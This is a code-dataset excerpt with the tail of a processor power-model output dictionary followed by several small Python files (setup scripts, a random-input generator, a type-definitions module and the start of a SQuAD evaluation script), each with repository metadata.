'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000904625,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000202829,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0564557,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.59106,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.138931,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.191749,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.98386,
'Instruction Fetch Unit/Runtime Dynamic': 0.388242,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0398899,
'L2/Runtime Dynamic': 0.0110088,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.61893,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.15718,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0770573,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0770572,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.98281,
'Load Store Unit/Runtime Dynamic': 1.61425,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.19001,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.38002,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0674352,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0680181,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.223279,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0228233,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.49523,
'Memory Management Unit/Runtime Dynamic': 0.0908414,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.1936,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.308764,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.012299,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0906719,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.411735,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.47859,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.144,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.315792,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.828175,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.300609,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.484871,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.244747,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.03023,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.216839,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.67756,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.15646,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0126089,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.143035,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0932505,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.299495,
'Execution Unit/Register Files/Runtime Dynamic': 0.105859,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.337343,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.759655,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.61691,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000561368,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000561368,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000492564,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000192656,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00133955,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00295485,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00525326,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0896441,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.70213,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.185252,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.304472,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.19738,
'Instruction Fetch Unit/Runtime Dynamic': 0.587575,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0331415,
'L2/Runtime Dynamic': 0.00690054,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.74011,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.20486,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0809777,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0809777,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.1225,
'Load Store Unit/Runtime Dynamic': 1.6852,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.199677,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.399355,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0708661,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0713609,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.354538,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0303777,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.632382,
'Memory Management Unit/Runtime Dynamic': 0.101739,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 22.2524,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.411575,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0185714,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.145597,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.575743,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.57406,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 3.8525058798762615,
'Runtime Dynamic': 3.8525058798762615,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.210089,
'Runtime Dynamic': 0.065201,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 81.4839,
'Peak Power': 114.596,
'Runtime Dynamic': 18.7807,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 81.2738,
'Total Cores/Runtime Dynamic': 18.7155,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.210089,
'Total L3s/Runtime Dynamic': 0.065201,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 0 | 0 | 0 |
679bb167edfe58aa3a25e865ce968ba67e0a51de | 405 | py | Python | setup.py | dakshvar22/Image-Transformer | a45e77e733ac1c83634edfd7652651c84beab8ae | [
"MIT"
] | 6 | 2018-03-20T13:01:36.000Z | 2021-02-07T03:09:55.000Z | setup.py | zhangzheng1993/Image-Transformer-1 | a45e77e733ac1c83634edfd7652651c84beab8ae | [
"MIT"
] | null | null | null | setup.py | zhangzheng1993/Image-Transformer-1 | a45e77e733ac1c83634edfd7652651c84beab8ae | [
"MIT"
] | 1 | 2021-02-07T03:09:58.000Z | 2021-02-07T03:09:58.000Z | from setuptools import setup
setup(name='imgTransformer',
version='0.1',
description='Apply Affine transformations to images and to their corresponding box annotations(optional).',
url='https://bitbucket.org/aganitha/image-transformer',
author='Daksh Varshneya',
author_email='daksh@aganitha.ai',
license='MIT',
packages=['imgTransformer'],
zip_safe=False) | 36.818182 | 113 | 0.698765 | from setuptools import setup
setup(name='imgTransformer',
version='0.1',
description='Apply Affine transformations to images and to their corresponding box annotations(optional).',
url='https://bitbucket.org/aganitha/image-transformer',
author='Daksh Varshneya',
author_email='daksh@aganitha.ai',
license='MIT',
packages=['imgTransformer'],
zip_safe=False) | 0 | 0 | 0 |
ef1187309a7dc7bcf2f9a30a6980bbaa6a9e607e | 1,010 | py | Python | setup.py | aokad/GenomonPostAnalysis | 59130597aabb4550f2dd45b0fe5daa10ed466b9e | [
"BSD-3-Clause"
] | null | null | null | setup.py | aokad/GenomonPostAnalysis | 59130597aabb4550f2dd45b0fe5daa10ed466b9e | [
"BSD-3-Clause"
] | 1 | 2016-02-03T03:02:44.000Z | 2016-02-03T03:02:44.000Z | setup.py | aokad/GenomonPostAnalysis | 59130597aabb4550f2dd45b0fe5daa10ed466b9e | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from genomon_post_analysis import __version__
setup(name='genomon_post_analysis',
version=__version__,
description="parser result files created by genomon",
long_description="""\n
parser result files created by genomon (SV, mutaion-call and so on)""",
classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='genomon post analysis',
author='ai okada',
author_email='genomon_team@gamil.com',
url='https://github.com/Genomon-Project/Genomon.git',
license='License of GenomonPipeline',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
scripts=['genomon_pa'],
data_files=[('config', ['genomon_post_analysis.cfg'])],
include_package_data=True,
zip_safe=False,
install_requires=[
# -*- Extra requirements: -*-
],
entry_points="""
# -*- Entry points: -*-
""",
)
| 34.827586 | 95 | 0.658416 | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from genomon_post_analysis import __version__
setup(name='genomon_post_analysis',
version=__version__,
description="parser result files created by genomon",
long_description="""\n
parser result files created by genomon (SV, mutaion-call and so on)""",
classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='genomon post analysis',
author='ai okada',
author_email='genomon_team@gamil.com',
url='https://github.com/Genomon-Project/Genomon.git',
license='License of GenomonPipeline',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
scripts=['genomon_pa'],
data_files=[('config', ['genomon_post_analysis.cfg'])],
include_package_data=True,
zip_safe=False,
install_requires=[
# -*- Extra requirements: -*-
],
entry_points="""
# -*- Entry points: -*-
""",
)
| 0 | 0 | 0 |
25e0e667349b8d5df9059920c0177bad8a1c5d96 | 158 | py | Python | hardwork/sicily_datastructure/make_random_in.py | jskyzero/Cplusplus.Playground | b4a82bb32af04efcffb6e251ac8956a3cc316174 | [
"MIT"
] | null | null | null | hardwork/sicily_datastructure/make_random_in.py | jskyzero/Cplusplus.Playground | b4a82bb32af04efcffb6e251ac8956a3cc316174 | [
"MIT"
] | null | null | null | hardwork/sicily_datastructure/make_random_in.py | jskyzero/Cplusplus.Playground | b4a82bb32af04efcffb6e251ac8956a3cc316174 | [
"MIT"
] | null | null | null | import random
with open('in', 'w') as f:
for _ in xrange(1000):
x = random.randint(1, 100)
f.write(str(random.randint(1, 10**x)) + '\n')
| 22.571429 | 53 | 0.550633 | import random
with open('in', 'w') as f:
for _ in xrange(1000):
x = random.randint(1, 100)
f.write(str(random.randint(1, 10**x)) + '\n')
| 0 | 0 | 0 |
900a78f05daf46f9c43e675546679632759dd7ff | 419 | py | Python | drain/types.py | codepr/drain | e2d9f1d3dfcc78ec8504eb2e8eef70b13247d174 | [
"WTFPL"
] | null | null | null | drain/types.py | codepr/drain | e2d9f1d3dfcc78ec8504eb2e8eef70b13247d174 | [
"WTFPL"
] | 1 | 2020-08-18T21:22:15.000Z | 2021-02-01T22:39:16.000Z | drain/types.py | codepr/drain | e2d9f1d3dfcc78ec8504eb2e8eef70b13247d174 | [
"WTFPL"
] | null | null | null | """
drain.types.py
~~~~~~~~~~~~~~
Contains custom types definitions and utilities
"""
from .record import Record
from typing import (
Awaitable,
AsyncIterable,
Callable,
Union,
TypeVar,
)
RecordT = TypeVar("RecordT", bound=Record)
Source = AsyncIterable[RecordT]
Processor = Union[
Callable[[RecordT], RecordT], Callable[[RecordT], Awaitable[RecordT]]
]
Predicate = Callable[[RecordT], bool]
| 18.217391 | 73 | 0.684964 | """
drain.types.py
~~~~~~~~~~~~~~
Contains custom types definitions and utilities
"""
from .record import Record
from typing import (
Awaitable,
AsyncIterable,
Callable,
Union,
TypeVar,
)
RecordT = TypeVar("RecordT", bound=Record)
Source = AsyncIterable[RecordT]
Processor = Union[
Callable[[RecordT], RecordT], Callable[[RecordT], Awaitable[RecordT]]
]
Predicate = Callable[[RecordT], bool]
| 0 | 0 | 0 |
c32d236082ab80c17404c0ea8d433bae280a34a9 | 2,403 | py | Python | evaluate.py | LanJosh/QuestionAnswer | 38066e3268ba1a95640ae87f4066bf7223c1ad4f | [
"MIT"
] | null | null | null | evaluate.py | LanJosh/QuestionAnswer | 38066e3268ba1a95640ae87f4066bf7223c1ad4f | [
"MIT"
] | null | null | null | evaluate.py | LanJosh/QuestionAnswer | 38066e3268ba1a95640ae87f4066bf7223c1ad4f | [
"MIT"
] | null | null | null | """
Functions for evaluating the performance of the model on the
squad dataset
Modified the official squad dataset evaluation script
"""
import string
import re
from collections import Counter
def normalize_answer(s):
"""Lower text and remove punctuation, articles, and extra whitespace."""
return white_space_fix(remove_articles(remove_punc(lower(s))))
def evaluate(predictions, answerss):
"""
